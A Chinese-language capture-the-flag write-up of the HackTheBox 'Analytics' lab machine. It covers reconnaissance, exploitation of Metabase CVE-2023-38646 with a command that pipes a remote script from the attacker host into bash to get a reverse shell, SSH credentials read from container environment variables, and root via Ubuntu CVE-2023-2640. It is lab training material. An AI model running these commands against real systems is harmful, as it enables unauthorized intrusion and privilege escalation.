HackTheBox—Analytics靶机

靶机难度不大 利用的都是较新的CVE漏洞

简介

一台新的Linux机器,在HTB官方难度为easy模式。

信息收集

启动靶机 确定靶机IP 然后测试本地与靶机的连接性。

image-20231011182526515

image-20231011182552362

测试连接成功。

使用nmap对 靶机进行开放端口扫描

nmap -sV 10.10.11.233

image-20231011182805030

开放端口为 22 和 80端口。

访问靶机 80端口。

image-20231011183044431

感觉是一个静态的前端页面,也没有得到建站CMS类型。

除了有一个登录口 进入登录口的界面。

使用路径扫描 看是否可以得到敏感信息。

dirsearch -u http://analytical.htb/

没有得到什么有效的路径信息。

尝试进行下host碰撞 将登录口跳转的data 子域名配合靶机的IP加入host文件中。

image-20231011193815543

成功访问

反弹shell

是Metabase 感觉是一个组件。直接谷歌查找一下有没有相关漏洞

有新鲜的漏洞信息。

国外有位师傅写了利用工具

GitHub - robotmikhro/CVE-2023-38646: Automatic Tools For Metabase Exploit Known As CVE-2023-38646

访问链接将工具下载下来。

首先在目录下一个反弹shell,然后启动服务。

image-20231011200542217

然后使用下载下来的工具

python3 single.py -u http://data.analytical.htb -c 'curl 10.10.14.30/1.sh |bash'

image-20231011200615091

注意1.sh| 之间要加空格 我开始打的时候 忘了加空格 结果半天没有反弹shell。

然后启动监听服务。

成功反弹shell。

image-20231011200739053

image-20231011201601186

发现有docker 的env文件 那么现在多半是在一个docker的容器里面。

输入env查看当前环境

image-20231011202029976

image-20231011202143513

开始还没发现。这个其实就是ssh的账号和密码

META_USER=metalytics   
META_PASS=An4lytics_ds20223#

成功连接ssh。

image-20231011202512841

权限提升

这里没有suid 和sudo -l直接尝试内核提权。

uname -a

image-20231011202627031

感觉是一个比较新的版本了。

使用kali里面的漏洞库进行提权 感觉不太现实。于是直接去谷歌查找最新漏洞。

image-20231011201159654

最后成功找到相关方案

https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/

【漏洞复现】CVE-2023-2640 Ubuntu本地权限提升 | CN-SEC 中文网

image-20231011203550364

成功反弹回来root权限。

image-20231011203856454

总结

这台机器难度比较简单 前期通过nday getshell但是那个时候 我们进去的是docker 容器里面 需要查找env配置文件得到ssh连接的账号密码。真正的拿下机器的普通用户权限。然后通过内核提权的方式进行权限提升。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值